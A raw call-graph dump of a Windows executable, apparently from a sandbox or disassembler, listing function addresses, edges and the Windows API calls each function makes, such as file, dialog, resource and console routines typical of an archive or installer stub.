25711 7ff655950ab8 25716 7ff655950ac7 UnmapViewOfFile 25711->25716 25713 7ff655950ce6 SleepEx 25712->25713 25715 7ff655950cec 25712->25715 25713->25715 25714 7ff655950cfa 25718 7ff655950d06 DeleteObject 25714->25718 25715->25714 25949 7ff655949f4c 25715->25949 25716->25689 25719 7ff655950d25 25718->25719 25720 7ff655950d1f DeleteObject 25718->25720 25721 7ff655950d5b 25719->25721 25722 7ff655950d6d 25719->25722 25720->25719 26021 7ff65594fe24 25721->26021 25975 7ff6559494e4 25722->25975 25729->25621 25732->25615 25733->25619 25735 7ff65595281e __scrt_dllmain_crt_thread_attach 25734->25735 25735->25637 25735->25638 25737 7ff655960d4c 25736->25737 25738 7ff655952830 25737->25738 25741 7ff65595ec00 25737->25741 25738->25638 25740 7ff6559551a0 7 API calls 2 library calls 25738->25740 25740->25638 25752 7ff65595f398 EnterCriticalSection 25741->25752 25758 7ff6559291c8 25753->25758 25757 7ff655952a01 25757->25644 25766 7ff6559356a4 25758->25766 25760 7ff6559291df 25769 7ff65593b788 25760->25769 25764 7ff655921130 25765 7ff6559529bc 34 API calls 25764->25765 25765->25757 25775 7ff6559356e8 25766->25775 25784 7ff6559213a4 25769->25784 25772 7ff655929a28 25773 7ff6559356e8 2 API calls 25772->25773 25774 7ff655929a36 25773->25774 25774->25764 25776 7ff6559356fe memcpy_s 25775->25776 25779 7ff65593eba4 25776->25779 25782 7ff65593eb58 GetCurrentProcess GetProcessAffinityMask 25779->25782 25783 7ff6559356de 25782->25783 25783->25760 25785 7ff6559213ad 25784->25785 25793 7ff65592142d 25784->25793 25786 7ff65592143d 25785->25786 25789 7ff6559213ce 25785->25789 25795 7ff655922018 33 API calls std::_Xinvalid_argument 25786->25795 25790 7ff6559521d0 33 API calls 25789->25790 25791 7ff6559213db memcpy_s 25789->25791 25790->25791 25794 7ff65592197c 31 API calls _invalid_parameter_noinfo_noreturn 25791->25794 25793->25772 25794->25793 25797 7ff6559532d3 GetStartupInfoW 25796->25797 25797->25623 25799 7ff65596073d 25798->25799 25801 7ff655960749 25798->25801 25803 7ff655960570 48 API calls 4 library calls 25799->25803 25801->25652 25802->25652 25803->25801 26027 7ff655952450 25804->26027 25807 7ff65593e026 GetProcAddress 25810 7ff65593e03b 25807->25810 25811 7ff65593e053 GetProcAddress 25807->25811 25808 7ff65593e07b 25809 7ff65593e503 25808->25809 26060 7ff65595b788 39 API calls _snwprintf 25808->26060 25814 7ff655936454 34 API calls 25809->25814 25810->25811 25811->25808 25812 7ff65593e068 25811->25812 25812->25808 25815 7ff65593e50c 25814->25815 26029 7ff655937df4 25815->26029 25816 7ff65593e3b0 25816->25809 25818 7ff65593e3ba 25816->25818 25819 7ff655936454 34 API calls 25818->25819 25820 7ff65593e3c3 CreateFileW 25819->25820 25822 7ff65593e4f0 CloseHandle 25820->25822 25823 7ff65593e403 SetFilePointer 25820->25823 25825 7ff655921fa0 31 API calls 25822->25825 25823->25822 25824 7ff65593e41c ReadFile 25823->25824 25824->25822 25826 7ff65593e444 25824->25826 25825->25809 25827 7ff65593e458 25826->25827 25828 7ff65593e800 25826->25828 25833 7ff65592129c 33 API calls 25827->25833 26066 7ff655952624 8 API calls 25828->26066 25830 7ff65593e805 25831 7ff65593e53e CompareStringW 25836 7ff65593e51a 25831->25836 25832 7ff65592129c 33 API calls 25832->25836 25834 7ff65593e48f 25833->25834 25842 7ff65593e4db 25834->25842 26061 7ff65593d0a0 33 API calls 25834->26061 25836->25831 25836->25832 25837 7ff655921fa0 31 API calls 25836->25837 25863 7ff65593e5cc 25836->25863 26037 7ff6559351a4 25836->26037 26042 7ff655938090 25836->26042 26046 7ff6559332bc 25836->26046 25837->25836 25839 7ff65593e648 26062 7ff655937eb0 47 API calls 25839->26062 25840 7ff65593e7c2 25844 7ff655921fa0 31 API calls 25840->25844 25845 7ff655921fa0 31 API calls 25842->25845 25847 7ff65593e7cb 25844->25847 25848 7ff65593e4e5 25845->25848 25846 7ff65593e651 25849 7ff6559351a4 9 API calls 25846->25849 25851 7ff655921fa0 31 API calls 25847->25851 25853 7ff655921fa0 31 API calls 25848->25853 25854 7ff65593e656 25849->25854 25850 7ff65592129c 33 API calls 25850->25863 25852 7ff65593e7d5 25851->25852 25856 7ff655952320 _handle_error 8 API calls 25852->25856 25853->25822 25857 7ff65593e706 25854->25857 25862 7ff65593e661 25854->25862 25855 7ff655938090 47 API calls 25855->25863 25859 7ff65593e7e4 25856->25859 25858 7ff65593da98 48 API calls 25857->25858 25861 7ff65593e74b AllocConsole 25858->25861 25881 7ff6559362dc GetCurrentDirectoryW 25859->25881 25860 7ff655921fa0 31 API calls 25860->25863 25864 7ff65593e6fb 25861->25864 25865 7ff65593e755 GetCurrentProcessId AttachConsole 25861->25865 25868 7ff65593aae0 48 API calls 25862->25868 25863->25850 25863->25855 25863->25860 25866 7ff6559332bc 51 API calls 25863->25866 25871 7ff65593e63a 25863->25871 26065 7ff6559219e0 31 API calls _invalid_parameter_noinfo_noreturn 25864->26065 25867 7ff65593e76c 25865->25867 25866->25863 25874 7ff65593e778 GetStdHandle WriteConsoleW Sleep FreeConsole 25867->25874 25870 7ff65593e6a5 25868->25870 25873 7ff65593da98 48 API calls 25870->25873 25871->25839 25871->25840 25872 7ff65593e7b9 ExitProcess 25875 7ff65593e6c3 25873->25875 25874->25864 25876 7ff65593aae0 48 API calls 25875->25876 25877 7ff65593e6ce 25876->25877 26063 7ff65593dc2c 33 API calls 25877->26063 25879 7ff65593e6da 26064 7ff6559219e0 31 API calls _invalid_parameter_noinfo_noreturn 25879->26064 25882 7ff655936300 25881->25882 25883 7ff65593638d 25881->25883 25884 7ff6559213a4 33 API calls 25882->25884 25883->25658 25885 7ff65593631b GetCurrentDirectoryW 25884->25885 25886 7ff655936341 25885->25886 26207 7ff6559220b0 25886->26207 25888 7ff65593634f 25888->25883 25889 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25888->25889 25890 7ff6559363a9 25889->25890 25892 7ff65593dd88 25891->25892 25893 7ff655949481 OleInitialize 25892->25893 25894 7ff6559494a7 25893->25894 25895 7ff6559494cd SHGetMalloc 25894->25895 25895->25660 25897 7ff655949a49 25896->25897 25903 7ff655949a4e memcpy_s 25896->25903 25898 7ff655921fa0 31 API calls 25897->25898 25898->25903 25899 7ff655921fa0 31 API calls 25905 7ff655949a7d memcpy_s 25899->25905 25900 7ff655921fa0 31 API calls 25901 7ff655949aac memcpy_s 25900->25901 25902 7ff655921fa0 31 API calls 25901->25902 25904 7ff655949adb memcpy_s 25901->25904 25902->25904 25903->25899 25903->25905 25904->25669 25905->25900 25905->25901 25907 7ff6559213a4 33 API calls 25906->25907 25908 7ff655936489 25907->25908 25909 7ff65593648c GetModuleFileNameW 25908->25909 25912 7ff6559364dc 25908->25912 25910 7ff6559364a7 25909->25910 25911 7ff6559364de 25909->25911 25910->25908 25911->25912 25913 7ff65592129c 33 API calls 25912->25913 25915 7ff655936506 25913->25915 25914 7ff65593653e 25914->25671 25915->25914 25916 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25915->25916 25917 7ff655936560 25916->25917 25919 7ff655933e4d _snwprintf 25918->25919 25920 7ff655959ef0 swprintf 46 API calls 25919->25920 25921 7ff655933e69 SetEnvironmentVariableW GetModuleHandleW LoadIconW 25920->25921 25922 7ff65594b014 LoadBitmapW 25921->25922 25923 7ff65594b03e 25922->25923 25926 7ff65594b046 25922->25926 26212 7ff655948624 FindResourceW 25923->26212 25925 7ff65594b04e GetObjectW 25927 7ff65594b063 25925->25927 25926->25925 25926->25927 26226 7ff65594849c 25927->26226 25930 7ff65594b0ce 25941 7ff6559398ac 25930->25941 25931 7ff65594b09e 26231 7ff655948504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25931->26231 25932 7ff655948624 10 API calls 25934 7ff65594b08a 25932->25934 25934->25931 25936 7ff65594b092 DeleteObject 25934->25936 25935 7ff65594b0a7 26232 7ff6559484cc 25935->26232 25936->25931 25940 7ff65594b0bf DeleteObject 25940->25930 26239 7ff6559398dc 25941->26239 25943 7ff6559398ba 26306 7ff65593a43c GetModuleHandleW FindResourceW 25943->26306 25945 7ff6559398c2 25945->25692 25947 7ff6559521d0 33 API calls 25946->25947 25948 7ff6559467fa 25947->25948 25948->25703 25950 7ff655949f92 25949->25950 25966 7ff655949ffe 25949->25966 25952 7ff65592129c 33 API calls 25950->25952 25951 7ff655921fa0 31 API calls 25953 7ff65594a019 25951->25953 25954 7ff655949fbc 25952->25954 25971 7ff65594a156 25953->25971 25974 7ff65594a189 25953->25974 26388 7ff655937fc4 25953->26388 25955 7ff655937df4 47 API calls 25954->25955 25958 7ff655949fd0 25955->25958 25956 7ff655952320 _handle_error 8 API calls 25959 7ff65594a167 25956->25959 26401 7ff6559413f4 CompareStringW 25958->26401 25959->25714 25960 7ff65594a074 26391 7ff655928d04 25960->26391 25962 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25965 7ff65594a18f 25962->25965 25964 7ff65594a0a3 25967 7ff65594a0ae 25964->25967 25969 7ff655921744 33 API calls 25964->25969 25966->25951 25966->25953 25968 7ff65594a0dd SHFileOperationW 25967->25968 25970 7ff65594a129 25968->25970 25968->25971 25969->25968 25970->25971 25972 7ff65594a184 25970->25972 25971->25956 25973 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 25972->25973 25973->25974 25974->25962 25976 7ff655949501 25975->25976 25977 7ff65594950a OleUninitialize 25976->25977 25978 7ff65598e330 25977->25978 26404 7ff655951558 25979->26404 25982 7ff65595198b 25984 7ff655951868 DloadReleaseSectionWriteAccess 6 API calls 25982->25984 25983 7ff6559519b4 25986 7ff655951a3d LoadLibraryExA 25983->25986 25987 7ff655951b85 25983->25987 25988 7ff655951aa9 25983->25988 25990 7ff655951abd 25983->25990 25985 7ff655951998 RaiseException 25984->25985 25998 7ff655951bb5 25985->25998 25986->25988 25989 7ff655951a54 GetLastError 25986->25989 26412 7ff655951868 25987->26412 25988->25990 25991 7ff655951ab4 FreeLibrary 25988->25991 25993 7ff655951a69 25989->25993 25994 7ff655951a7e 25989->25994 25990->25987 25992 7ff655951b1b GetProcAddress 25990->25992 25991->25990 25992->25987 25997 7ff655951b30 GetLastError 25992->25997 25993->25988 25993->25994 25996 7ff655951868 DloadReleaseSectionWriteAccess 6 API calls 25994->25996 25999 7ff655951a8b RaiseException 25996->25999 26000 7ff655951b45 25997->26000 25998->25682 25999->25998 26000->25987 26001 7ff655951868 DloadReleaseSectionWriteAccess 6 API calls 26000->26001 26002 7ff655951b67 RaiseException 26001->26002 26003 7ff655951558 _com_raise_error 6 API calls 26002->26003 26004 7ff655951b81 26003->26004 26004->25987 26007 7ff6559212d0 26005->26007 26013 7ff65592139b 26005->26013 26009 7ff655921396 26007->26009 26010 7ff655921338 26007->26010 26012 7ff6559212de memcpy_s 26007->26012 26433 7ff655921f80 33 API calls 3 library calls 26009->26433 26010->26012 26014 7ff6559521d0 33 API calls 26010->26014 26012->25673 26434 7ff655922004 33 API calls std::_Xinvalid_argument 26013->26434 26014->26012 26015->25681 26016->25698 26017->25704 26018->25708 26019->25711 26020->25701 26022 7ff65594fe77 WaitForSingleObject 26021->26022 26023 7ff65594fe89 CloseHandle 26022->26023 26024 7ff65594fe2f PeekMessageW 26022->26024 26023->25722 26025 7ff65594fe4b GetMessageW TranslateMessage DispatchMessageW 26024->26025 26026 7ff65594fe74 26024->26026 26025->26026 26026->26022 26028 7ff65593dff4 GetModuleHandleW 26027->26028 26028->25807 26028->25808 26030 7ff655937e0c 26029->26030 26031 7ff655937e55 26030->26031 26032 7ff655937e23 26030->26032 26067 7ff65592704c 47 API calls memcpy_s 26031->26067 26034 7ff65592129c 33 API calls 26032->26034 26036 7ff655937e47 26034->26036 26035 7ff655937e5a 26036->25836 26038 7ff6559351c8 GetVersionExW 26037->26038 26039 7ff6559351fb 26037->26039 26038->26039 26040 7ff655952320 _handle_error 8 API calls 26039->26040 26041 7ff655935228 26040->26041 26041->25836 26043 7ff6559380a5 26042->26043 26068 7ff655938188 26043->26068 26045 7ff6559380ca 26045->25836 26047 7ff6559332e7 GetFileAttributesW 26046->26047 26048 7ff6559332e4 26046->26048 26049 7ff6559332f8 26047->26049 26056 7ff655933375 26047->26056 26048->26047 26077 7ff655936a0c 26049->26077 26051 7ff655952320 _handle_error 8 API calls 26053 7ff655933389 26051->26053 26053->25836 26054 7ff655933323 GetFileAttributesW 26055 7ff65593333c 26054->26055 26055->26056 26057 7ff655933399 26055->26057 26056->26051 26058 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26057->26058 26059 7ff65593339e 26058->26059 26060->25816 26061->25834 26062->25846 26063->25879 26064->25864 26065->25872 26066->25830 26067->26035 26069 7ff655938326 26068->26069 26073 7ff6559381ba 26068->26073 26076 7ff65592704c 47 API calls memcpy_s 26069->26076 26071 7ff6559381d4 memcpy_s 26071->26045 26072 7ff65593832b 26073->26071 26075 7ff6559358a4 33 API calls 2 library calls 26073->26075 26075->26071 26076->26072 26078 7ff655936a4b 26077->26078 26098 7ff655936a44 26077->26098 26081 7ff65592129c 33 API calls 26078->26081 26079 7ff655952320 _handle_error 8 API calls 26080 7ff65593331f 26079->26080 26080->26054 26080->26055 26082 7ff655936a76 26081->26082 26083 7ff655936a96 26082->26083 26084 7ff655936cc7 26082->26084 26086 7ff655936ab0 26083->26086 26113 7ff655936b49 26083->26113 26085 7ff6559362dc 35 API calls 26084->26085 26088 7ff655936ce6 26085->26088 26087 7ff6559370ab 26086->26087 26150 7ff65592c098 26086->26150 26195 7ff655922004 33 API calls std::_Xinvalid_argument 26087->26195 26089 7ff655936eef 26088->26089 26091 7ff655936d1b 26088->26091 26147 7ff655936b44 26088->26147 26094 7ff6559370cf 26089->26094 26100 7ff65592c098 33 API calls 26089->26100 26095 7ff6559370bd 26091->26095 26102 7ff65592c098 33 API calls 26091->26102 26092 7ff6559370b1 26103 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26092->26103 26198 7ff655922004 33 API calls std::_Xinvalid_argument 26094->26198 26196 7ff655922004 33 API calls std::_Xinvalid_argument 26095->26196 26096 7ff6559370d5 26104 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26096->26104 26098->26079 26099 7ff655936b03 26114 7ff655921fa0 31 API calls 26099->26114 26116 7ff655936b15 memcpy_s 26099->26116 26106 7ff655936f56 26100->26106 26127 7ff655936d76 memcpy_s 26102->26127 26111 7ff6559370b7 26103->26111 26112 7ff6559370db 26104->26112 26105 7ff6559370a6 26110 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26105->26110 26193 7ff6559211cc 33 API calls memcpy_s 26106->26193 26108 7ff6559370c3 26121 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26108->26121 26109 7ff655921fa0 31 API calls 26109->26147 26110->26087 26122 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26111->26122 26118 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26112->26118 26115 7ff65592129c 33 API calls 26113->26115 26113->26147 26114->26116 26119 7ff655936bbe 26115->26119 26116->26109 26117 7ff655936f69 26194 7ff6559357ac 33 API calls memcpy_s 26117->26194 26124 7ff6559370e1 26118->26124 26158 7ff655935820 26119->26158 26126 7ff6559370c9 26121->26126 26122->26095 26123 7ff655921fa0 31 API calls 26132 7ff655936df5 26123->26132 26197 7ff65592704c 47 API calls memcpy_s 26126->26197 26127->26108 26127->26123 26131 7ff655921fa0 31 API calls 26134 7ff655936fec 26131->26134 26136 7ff655936e21 26132->26136 26176 7ff655921744 26132->26176 26133 7ff655936f79 memcpy_s 26133->26112 26133->26131 26135 7ff655921fa0 31 API calls 26134->26135 26138 7ff655936ff6 26135->26138 26136->26126 26142 7ff65592129c 33 API calls 26136->26142 26137 7ff655921fa0 31 API calls 26140 7ff655936c6d 26137->26140 26141 7ff655921fa0 31 API calls 26138->26141 26144 7ff655921fa0 31 API calls 26140->26144 26141->26147 26145 7ff655936ec2 26142->26145 26143 7ff655936be9 memcpy_s 26143->26111 26143->26137 26144->26147 26189 7ff655922034 26145->26189 26147->26092 26147->26096 26147->26098 26147->26105 26148 7ff655936edf 26149 7ff655921fa0 31 API calls 26148->26149 26149->26147 26151 7ff65592c0e5 26150->26151 26154 7ff65592c0fa memcpy_s 26150->26154 26152 7ff65592c12c 26151->26152 26153 7ff65592c1a5 26151->26153 26151->26154 26152->26154 26157 7ff6559521d0 33 API calls 26152->26157 26199 7ff655921f80 33 API calls 3 library calls 26153->26199 26154->26099 26156 7ff65592c1aa 26157->26154 26159 7ff655935849 26158->26159 26160 7ff65593589e 26159->26160 26161 7ff65593585b 26159->26161 26200 7ff655922004 33 API calls std::_Xinvalid_argument 26160->26200 26163 7ff65592c098 33 API calls 26161->26163 26165 7ff655935886 26163->26165 26166 7ff65592e164 26165->26166 26167 7ff65592e1b2 26166->26167 26170 7ff65592e2bc 26167->26170 26171 7ff65592e340 26167->26171 26173 7ff65592e345 26167->26173 26175 7ff65592e1b8 memcpy_s 26167->26175 26174 7ff6559521d0 33 API calls 26170->26174 26170->26175 26201 7ff655921f80 33 API calls 3 library calls 26171->26201 26202 7ff655922004 33 API calls std::_Xinvalid_argument 26173->26202 26174->26175 26175->26143 26177 7ff6559218a1 26176->26177 26180 7ff655921784 26176->26180 26203 7ff655922004 33 API calls std::_Xinvalid_argument 26177->26203 26179 7ff6559218a7 26204 7ff655921f80 33 API calls 3 library calls 26179->26204 26180->26179 26183 7ff6559521d0 33 API calls 26180->26183 26187 7ff6559217ac memcpy_s 26180->26187 26182 7ff6559218ad 26205 7ff65595354c 31 API calls __std_exception_copy 26182->26205 26183->26187 26185 7ff6559218d9 26185->26136 26186 7ff655921859 memcpy_s 26186->26136 26187->26186 26188 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26187->26188 26188->26177 26190 7ff655922085 26189->26190 26192 7ff655922059 memcpy_s 26189->26192 26206 7ff6559215b8 33 API calls 3 library calls 26190->26206 26192->26148 26193->26117 26194->26133 26197->26094 26199->26156 26201->26173 26204->26182 26205->26185 26206->26192 26208 7ff6559220f6 26207->26208 26210 7ff6559220cb memcpy_s 26207->26210 26211 7ff655921474 33 API calls 3 library calls 26208->26211 26210->25888 26211->26210 26213 7ff65594879b 26212->26213 26214 7ff65594864f SizeofResource 26212->26214 26213->25926 26214->26213 26215 7ff655948669 LoadResource 26214->26215 26215->26213 26216 7ff655948682 LockResource 26215->26216 26216->26213 26217 7ff655948697 GlobalAlloc 26216->26217 26217->26213 26218 7ff6559486b8 GlobalLock 26217->26218 26219 7ff655948792 GlobalFree 26218->26219 26220 7ff6559486ca memcpy_s 26218->26220 26219->26213 26221 7ff6559486f6 GdipAlloc 26220->26221 26222 7ff655948789 GlobalUnlock 26220->26222 26223 7ff65594870b 26221->26223 26222->26219 26223->26222 26224 7ff65594875a GdipCreateHBITMAPFromBitmap 26223->26224 26225 7ff655948772 26223->26225 26224->26225 26225->26222 26227 7ff6559484cc 4 API calls 26226->26227 26228 7ff6559484aa 26227->26228 26229 7ff6559484b9 26228->26229 26237 7ff655948504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26228->26237 26229->25930 26229->25931 26229->25932 26231->25935 26233 7ff6559484e3 26232->26233 26234 7ff6559484de 26232->26234 26236 7ff655948df4 16 API calls _handle_error 26233->26236 26238 7ff655948590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26234->26238 26236->25940 26237->26229 26238->26233 26242 7ff6559398fe _snwprintf 26239->26242 26240 7ff655939973 26357 7ff6559368b0 48 API calls 26240->26357 26242->26240 26243 7ff655939a89 26242->26243 26246 7ff6559399fd 26243->26246 26249 7ff6559220b0 33 API calls 26243->26249 26244 7ff655921fa0 31 API calls 26244->26246 26245 7ff65593997d memcpy_s 26245->26244 26247 7ff65593a42e 26245->26247 26308 7ff6559324c0 26246->26308 26248 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26247->26248 26250 7ff65593a434 26248->26250 26249->26246 26253 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26250->26253 26255 7ff65593a43a 26253->26255 26254 7ff655939a22 26257 7ff65593204c 100 API calls 26254->26257 26256 7ff655939b17 26326 7ff65595a450 26256->26326 26259 7ff655939a2b 26257->26259 26259->26250 26262 7ff655939a66 26259->26262 26261 7ff655939aad 26261->26256 26265 7ff655938e58 33 API calls 26261->26265 26264 7ff655952320 _handle_error 8 API calls 26262->26264 26263 7ff65595a450 31 API calls 26277 7ff655939b57 __vcrt_FlsAlloc 26263->26277 26266 7ff65593a40e 26264->26266 26265->26261 26266->25943 26267 7ff655939c89 26268 7ff655932aa0 101 API calls 26267->26268 26280 7ff655939d5c 26267->26280 26271 7ff655939ca1 26268->26271 26274 7ff6559328d0 104 API calls 26271->26274 26271->26280 26278 7ff655939cc9 26274->26278 26277->26267 26277->26280 26334 7ff655932bb0 26277->26334 26343 7ff6559328d0 26277->26343 26348 7ff655932aa0 26277->26348 26278->26280 26301 7ff655939cd7 __vcrt_FlsAlloc 26278->26301 26358 7ff655940bbc MultiByteToWideChar 26278->26358 26353 7ff65593204c 26280->26353 26281 7ff65593a1ec 26291 7ff65593a2c2 26281->26291 26364 7ff65595cf90 31 API calls 2 library calls 26281->26364 26283 7ff65593a157 26283->26281 26361 7ff65595cf90 31 API calls 2 library calls 26283->26361 26284 7ff65593a14b 26284->25943 26287 7ff65593a3a2 26290 7ff65595a450 31 API calls 26287->26290 26288 7ff65593a249 26365 7ff65595b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26288->26365 26289 7ff65593a2ae 26289->26291 26366 7ff655938cd0 33 API calls 2 library calls 26289->26366 26293 7ff65593a3cb 26290->26293 26291->26287 26298 7ff655938e58 33 API calls 26291->26298 26294 7ff65595a450 31 API calls 26293->26294 26294->26280 26296 7ff65593a16d 26362 7ff65595b7bc 31 API calls _invalid_parameter_noinfo_noreturn 26296->26362 26297 7ff65593a1d8 26297->26281 26363 7ff655938cd0 33 API calls 2 library calls 26297->26363 26298->26291 26299 7ff655940f68 WideCharToMultiByte 26299->26301 26301->26280 26301->26281 26301->26283 26301->26284 26301->26299 26302 7ff65593a429 26301->26302 26359 7ff65593aa88 45 API calls _snwprintf 26301->26359 26360 7ff65595a270 31 API calls 2 library calls 26301->26360 26367 7ff655952624 8 API calls 26302->26367 26307 7ff65593a468 26306->26307 26307->25945 26309 7ff6559324fd CreateFileW 26308->26309 26311 7ff6559325ae GetLastError 26309->26311 26319 7ff65593266e 26309->26319 26312 7ff655936a0c 49 API calls 26311->26312 26313 7ff6559325dc 26312->26313 26314 7ff6559325e0 CreateFileW GetLastError 26313->26314 26320 7ff65593262c 26313->26320 26314->26320 26315 7ff6559326b1 SetFileTime 26318 7ff6559326cf 26315->26318 26316 7ff655932708 26317 7ff655952320 _handle_error 8 API calls 26316->26317 26321 7ff65593271b 26317->26321 26318->26316 26322 7ff6559220b0 33 API calls 26318->26322 26319->26315 26319->26318 26320->26319 26323 7ff655932736 26320->26323 26321->26254 26321->26261 26322->26316 26324 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 26323->26324 26325 7ff65593273b 26324->26325 26327 7ff65595a47d 26326->26327 26333 7ff65595a492 26327->26333 26368 7ff65595d69c 15 API calls _set_errno_from_matherr 26327->26368 26329 7ff65595a487 26369 7ff6559578e4 31 API calls _invalid_parameter_noinfo_noreturn 26329->26369 26331 7ff655952320 _handle_error 8 API calls 26332 7ff655939b37 26331->26332 26332->26263 26333->26331 26335 7ff655932bcd 26334->26335 26336 7ff655932be9 26334->26336 26337 7ff655932bfb 26335->26337 26370 7ff65592b9c4 99 API calls Concurrency::cancel_current_task 26335->26370 26336->26337 26339 7ff655932c01 SetFilePointer 26336->26339 26337->26277 26339->26337 26340 7ff655932c1e GetLastError 26339->26340 26340->26337 26341 7ff655932c28 26340->26341 26341->26337 26371 7ff65592b9c4 99 API calls Concurrency::cancel_current_task 26341->26371 26344 7ff6559328f6 26343->26344 26346 7ff6559328fd 26343->26346 26344->26277 26346->26344 26347 7ff655932320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26346->26347 26372 7ff65592b8a4 99 API calls Concurrency::cancel_current_task 26346->26372 26347->26346 26373 7ff655932778 26348->26373 26351 7ff655932ac7 26351->26277 26354 7ff655932066 26353->26354 26355 7ff655932072 26353->26355 26354->26355 26381 7ff6559320d0 26354->26381 26357->26245 26358->26301 26359->26301 26360->26301 26361->26296 26362->26297 26363->26281 26364->26288 26365->26289 26366->26291 26367->26247 26368->26329 26369->26333 26379 7ff655932789 _snwprintf 26373->26379 26374 7ff6559327b5 26376 7ff655952320 _handle_error 8 API calls 26374->26376 26375 7ff655932890 SetFilePointer 26375->26374 26377 7ff6559328b8 GetLastError 26375->26377 26378 7ff65593281d 26376->26378 26377->26374 26378->26351 26380 7ff65592b9c4 99 API calls Concurrency::cancel_current_task 26378->26380 26379->26374 26379->26375 26382 7ff655932102 26381->26382 26383 7ff6559320ea 26381->26383 26384 7ff655932126 26382->26384 26387 7ff65592b544 99 API calls 26382->26387 26383->26382 26385 7ff6559320f6 FindCloseChangeNotification 26383->26385 26384->26355 26385->26382 26387->26384 26389 7ff655937fcf 26388->26389 26390 7ff655937fd2 SetCurrentDirectoryW 26388->26390 26389->26390 26390->25960 26393 7ff655928d34 26391->26393 26398 7ff655928de8 26391->26398 26395 7ff655928d91 26393->26395 26396 7ff655928de3 26393->26396 26399 7ff655928d42 memcpy_s 26393->26399 26395->26399 26400 7ff6559521d0 33 API calls 26395->26400 26402 7ff655921f80 33 API calls 3 library calls 26396->26402 26403 7ff655922004 33 API calls std::_Xinvalid_argument 26398->26403 26399->25964 26400->26399 26401->25966 26402->26398 26405 7ff65595156e 26404->26405 26411 7ff6559515d3 26404->26411 26420 7ff655951604 26405->26420 26408 7ff6559515ce 26409 7ff655951604 DloadReleaseSectionWriteAccess 3 API calls 26408->26409 26409->26411 26411->25982 26411->25983 26413 7ff655951878 26412->26413 26419 7ff6559518d1 26412->26419 26414 7ff655951604 DloadReleaseSectionWriteAccess 3 API calls 26413->26414 26415 7ff65595187d 26414->26415 26416 7ff6559518cc 26415->26416 26418 7ff6559517d8 DloadProtectSection 3 API calls 26415->26418 26417 7ff655951604 DloadReleaseSectionWriteAccess 3 API calls 26416->26417 26417->26419 26418->26416 26419->25998 26421 7ff655951573 26420->26421 26422 7ff65595161f 26420->26422 26421->26408 26427 7ff6559517d8 26421->26427 26422->26421 26423 7ff655951624 GetModuleHandleW 26422->26423 26424 7ff655951639 26423->26424 26425 7ff65595163e GetProcAddress 26423->26425 26424->26421 26425->26424 26426 7ff655951653 GetProcAddress 26425->26426 26426->26424 26428 7ff6559517fa DloadProtectSection 26427->26428 26429 7ff655951802 26428->26429 26430 7ff65595183a VirtualProtect 26428->26430 26432 7ff6559516a4 VirtualQuery GetSystemInfo 26428->26432 26429->26408 26430->26429 26432->26430 26433->26013 26453 7ff655950df5 14 API calls _com_raise_error 26479 7ff65595d94c 26480 7ff65595d997 26479->26480 26484 7ff65595d95b _set_errno_from_matherr 26479->26484 26486 7ff65595d69c 15 API calls _set_errno_from_matherr 26480->26486 26482 7ff65595d97e RtlAllocateHeap 26483 7ff65595d995 26482->26483 26482->26484 26484->26480 26484->26482 26485 7ff65595bbc0 _set_errno_from_matherr 2 API calls 26484->26485 26485->26484 26486->26483 26499 7ff65594b190 26844 7ff65592255c 26499->26844 26501 7ff65594b1db 26502 7ff65594be93 26501->26502 26503 7ff65594b1ef 26501->26503 26653 7ff65594b20c 26501->26653 27083 7ff65594f390 26502->27083 26507 7ff65594b2db 26503->26507 26508 7ff65594b1ff 26503->26508 26503->26653 26506 7ff655952320 _handle_error 8 API calls 26512 7ff65594c350 26506->26512 26509 7ff65594b391 26507->26509 26515 7ff65594b2f5 26507->26515 26513 7ff65594b207 26508->26513 26514 7ff65594b2a9 26508->26514 26852 7ff6559222bc GetDlgItem 26509->26852 26510 7ff65594beba IsDlgButtonChecked 26511 7ff65594bec9 26510->26511 26517 7ff65594bed5 SendDlgItemMessageW 26511->26517 26518 7ff65594bef0 GetDlgItem IsDlgButtonChecked 26511->26518 26520 7ff65593aae0 48 API calls 26513->26520 26513->26653 26519 7ff65594b2cb EndDialog 26514->26519 26514->26653 26521 7ff65593aae0 48 API calls 26515->26521 26517->26518 26523 7ff6559362dc 35 API calls 26518->26523 26519->26653 26524 7ff65594b236 26520->26524 26525 7ff65594b313 SetDlgItemTextW 26521->26525 26526 7ff65594bf47 GetDlgItem 26523->26526 27106 7ff655921ec4 34 API calls _handle_error 26524->27106 26529 7ff65594b326 26525->26529 27102 7ff655922520 26526->27102 26528 7ff65594b408 GetDlgItem 26533 7ff65594b422 IsDlgButtonChecked IsDlgButtonChecked 26528->26533 26534 7ff65594b44f SetFocus 26528->26534 26539 7ff65594b340 GetMessageW 26529->26539 26529->26653 26532 7ff65594b246 26538 7ff65594b25c 26532->26538 26544 7ff65592250c SetDlgItemTextW 26532->26544 26533->26534 26540 7ff65594b4f2 26534->26540 26541 7ff65594b465 26534->26541 26536 7ff65594b3da 26542 7ff655921fa0 31 API calls 26536->26542 26556 7ff65594c363 26538->26556 26538->26653 26546 7ff65594b35e IsDialogMessageW 26539->26546 26539->26653 26545 7ff655928d04 33 API calls 26540->26545 26548 7ff65593aae0 48 API calls 26541->26548 26542->26653 26544->26538 26550 7ff65594b52c 26545->26550 26546->26529 26551 7ff65594b373 TranslateMessage DispatchMessageW 26546->26551 26547 7ff65594bcc5 26552 7ff65593aae0 48 API calls 26547->26552 26553 7ff65594b46f 26548->26553 27107 7ff65594ef80 33 API 